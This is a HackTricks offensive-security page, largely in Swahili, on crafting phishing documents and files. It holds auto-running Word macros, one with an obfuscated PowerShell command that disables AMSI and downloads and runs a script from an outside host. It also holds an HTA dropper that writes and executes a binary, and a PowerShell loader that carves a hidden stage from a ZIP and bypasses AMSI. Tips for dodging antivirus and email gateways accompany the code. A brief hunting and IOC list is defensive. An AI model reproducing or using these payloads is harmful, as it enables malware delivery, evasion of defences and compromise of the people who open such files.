Faili na Nyaraka za Phishing

Reading time: 8 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Nyaraka za Office

Microsoft Word hufanya uhakiki wa data za faili kabla ya kufungua faili. Uhakiiki wa data unafanywa kwa njia ya utambuzi wa muundo wa data, kulingana na viwango vya OfficeOpenXML. Ikiwa hitilafu yoyote itatokea wakati wa utambuzi wa muundo wa data, faili inayochunguzwa haitafunguliwa.

Kwa kawaida, faili za Word zenye macros zinatumia extension ya .docm. Hata hivyo, inawezekana kubadilisha jina la faili kwa kubadilisha extension ya faili na bado kuhifadhi uwezo wao wa kutekeleza macros.
Kwa mfano, faili ya RTF haiungi mkono macros, kwa muundo, lakini faili ya DOCM iliyobadilishwa jina kuwa RTF itashughulikiwa na Microsoft Word na itakuwa na uwezo wa kutekeleza macros.
Mekanismi na vipengele vya ndani sawa vinatumika kwa programu zote za Microsoft Office Suite (Excel, PowerPoint etc.).

Unaweza kutumia amri ifuatayo kuangalia ni extension zipi ambazo zitatekelezwa na baadhi ya programu za Office:

bash
assoc | findstr /i "word excel powerp"

Faili za DOCX zinazorejelea kiolezo cha mbali (File –Options –Add-ins –Manage: Templates –Go) ambazo zina macros zinaweza pia “execute” macros.

Kupakia Picha za Nje

Nenda kwa: Insert --> Quick Parts --> Field
Categories: Links and References, Filed names: includePicture, and Filename or URL: http:///whatever

Macros Backdoor

Inawezekana kutumia macros kuendesha arbitrary code kutoka kwenye dokumenti.

Autoload functions

Kadiri zinavyokuwa za kawaida zaidi, ndivyo uwezekano wa AV kuzitambua.

  • AutoOpen()
  • Document_Open()

Mifano ya Macros Code

vba
Sub AutoOpen()
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
End Sub
vba
Sub AutoOpen()

Dim Shell As Object
Set Shell = CreateObject("wscript.shell")
Shell.Run "calc"

End Sub
vba
Dim author As String
author = oWB.BuiltinDocumentProperties("Author")
With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
.StdIn.WriteLine author
.StdIn.WriteBlackLines 1
vba
Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell <beacon line generated>

Ondoa metadata kwa mkono

Nenda kwenye File > Info > Inspect Document > Inspect Document, ambayo itafungua Document Inspector. Bonyeza Inspect kisha Remove All kando ya Document Properties and Personal Information.

Ugani la Doc

When finished, select Save as type dropdown, change the format from .docx to Word 97-2003 .doc.
Fanya hivi kwa sababu wewe can't save macro's inside a .docx na kuna aibu inayohusiana na ugani unaounga mkono macro .docm (mfano ikoni ya thumbnail ina ! kubwa na baadhi ya web/email gateway huzuia kabisa). Kwa hiyo, ugani wa zamani .doc ndio suluhisho bora.

Malicious Macros Generators

Faili za HTA

HTA ni programu ya Windows ambayo inachanganya HTML na lugha za scripting (such as VBScript and JScript). Inaunda kiolesura cha mtumiaji na inatekelezwa kama programu "fully trusted", bila vikwazo vya modeli ya usalama ya browser.

HTA inatekelezwa kwa kutumia mshta.exe, ambayo kwa kawaida huwekwa pamoja na Internet Explorer, na hivyo kufanya mshta dependant on IE. Hivyo, kama imeondolewa, HTA hazitaweza kutekelezwa.

html
<--! Basic HTA Execution -->
<html>
<head>
<title>Hello World</title>
</head>
<body>
<h2>Hello World</h2>
<p>This is an HTA...</p>
</body>

<script language="VBScript">
Function Pwn()
Set shell = CreateObject("wscript.Shell")
shell.run "calc"
End Function

Pwn
</script>
</html>
html
<--! Cobal Strike generated HTA without shellcode -->
<script language="VBScript">
Function var_func()
var_shellcode = "<shellcode>"

Dim var_obj
Set var_obj = CreateObject("Scripting.FileSystemObject")
Dim var_stream
Dim var_tempdir
Dim var_tempexe
Dim var_basedir
Set var_tempdir = var_obj.GetSpecialFolder(2)
var_basedir = var_tempdir & "\" & var_obj.GetTempName()
var_obj.CreateFolder(var_basedir)
var_tempexe = var_basedir & "\" & "evil.exe"
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
For i = 1 to Len(var_shellcode) Step 2
var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
Next
var_stream.Close
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run var_tempexe, 0, true
var_obj.DeleteFile(var_tempexe)
var_obj.DeleteFolder(var_basedir)
End Function

var_func
self.close
</script>

Kulazimisha NTLM Authentication

Kuna njia kadhaa za kulazimisha NTLM authentication "remotely", kwa mfano, unaweza kuongeza picha zisizoonekana kwenye barua pepe au HTML ambazo mtumiaji ataziingia (hata HTTP MitM?). Au mtume mwathiriwa anuani ya faili ambayo itawasha authentication kwa kufungua folda tu.

Angalia mawazo haya na zaidi katika kurasa zifuatazo:

Force NTLM Privileged Authentication

Places to steal NTLM creds

NTLM Relay

Usisahau kwamba huwezi kuiba tu hash au authentication, bali pia perform NTLM relay attacks:

LNK Loaders + ZIP-Embedded Payloads (fileless chain)

Kampeni zenye ufanisi mkubwa hutuma ZIP inayojumuisha hati mbili halali za kuwadanganya (PDF/DOCX) na .lnk yenye madhara. Njia ni kwamba PowerShell loader mwenyewe imehifadhiwa ndani ya raw bytes za ZIP baada ya marker maalum, na .lnk huichonga na kuiendesha yote ndani ya memory.

Mtiririko wa kawaida unaotekelezwa na .lnk PowerShell one-liner:

  1. Tafuta ZIP asili katika njia za kawaida: Desktop, Downloads, Documents, %TEMP%, %ProgramData%, na parent ya current working directory.
  2. Soma bytes za ZIP na upate marker iliyowekwa (mfano, xFIQCV). Kila kitu kilicho baada ya marker ni PowerShell payload iliyowekwa.
  3. Nakili ZIP hadi %ProgramData%, extract hapo, na fungua decoy .docx ionekane halali.
  4. Kwepa AMSI kwa process ya sasa: [System.Management.Automation.AmsiUtils]::amsiInitFailed = $true
  5. Deobfuscate stage inayofuata (mfano, ondoa wote # characters) na uitekelleze ndani ya memory.

Example PowerShell skeleton to carve and run the embedded stage:

powershell
$marker   = [Text.Encoding]::ASCII.GetBytes('xFIQCV')
$paths    = @(
"$env:USERPROFILE\Desktop", "$env:USERPROFILE\Downloads", "$env:USERPROFILE\Documents",
"$env:TEMP", "$env:ProgramData", (Get-Location).Path, (Get-Item '..').FullName
)
$zip = Get-ChildItem -Path $paths -Filter *.zip -ErrorAction SilentlyContinue -Recurse | Sort-Object LastWriteTime -Descending | Select-Object -First 1
if(-not $zip){ return }
$bytes = [IO.File]::ReadAllBytes($zip.FullName)
$idx   = [System.MemoryExtensions]::IndexOf($bytes, $marker)
if($idx -lt 0){ return }
$stage = $bytes[($idx + $marker.Length) .. ($bytes.Length-1)]
$code  = [Text.Encoding]::UTF8.GetString($stage) -replace '#',''
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Invoke-Expression $code

Notes

  • Usambazaji mara nyingi hutumia vibaya subdomains za PaaS zenye sifa nzuri (mfano, *.herokuapp.com) na inaweza kuweka vizuizi kwa payloads (kutoa ZIP zisizo hatari kulingana na IP/UA).
  • Hatua inayofuata mara nyingi hu-decrypt base64/XOR shellcode na kuitekeleza kupitia Reflection.Emit + VirtualAlloc ili kupunguza alama kwenye diski.

Persistence used in the same chain

  • COM TypeLib hijacking of the Microsoft Web Browser control so that IE/Explorer or any app embedding it re-launches the payload automatically. See details and ready-to-use commands here:

COM Hijacking

Hunting/IOCs

  • ZIP files containing the ASCII marker string (e.g., xFIQCV) appended to the archive data.
  • .lnk that enumerates parent/user folders to locate the ZIP and opens a decoy document.
  • AMSI tampering via [System.Management.Automation.AmsiUtils]::amsiInitFailed.
  • Long-running business threads ending with links hosted under trusted PaaS domains.

Windows files to steal NTLM hashes

Angalia ukurasa kuhusu places to steal NTLM creds:

Places to steal NTLM creds

Marejeo

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks